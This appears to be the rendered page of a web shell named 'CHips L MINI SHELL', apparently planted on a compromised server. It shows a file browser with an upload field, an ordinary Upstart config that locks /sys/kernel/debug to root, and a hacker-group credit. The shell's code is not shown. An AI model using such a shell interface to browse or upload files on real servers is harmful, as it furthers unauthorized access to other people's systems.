CHips L MINI SHELL

CHips L pro

Current Path : /etc/init/
Upload File :
Current File : //etc/init/mounted-debugfs.conf

# mounted-debugfs - Fix perms on /sys/kernel/debug filesystem
#
# Since /sys/kernel/debug should not be used on production systems,
# this makes sure that the tree is kept accessible only by root.

description	"Fix-up /sys/kernel/debug filesystem"

start on mounted MOUNTPOINT=/sys/kernel/debug TYPE=debugfs
env MOUNTPOINT=/sys/kernel/debug

task

script
    chmod 0700 "${MOUNTPOINT}" || true
end script

Copyright 2K16 - 2K18 Indonesian Hacker Rulez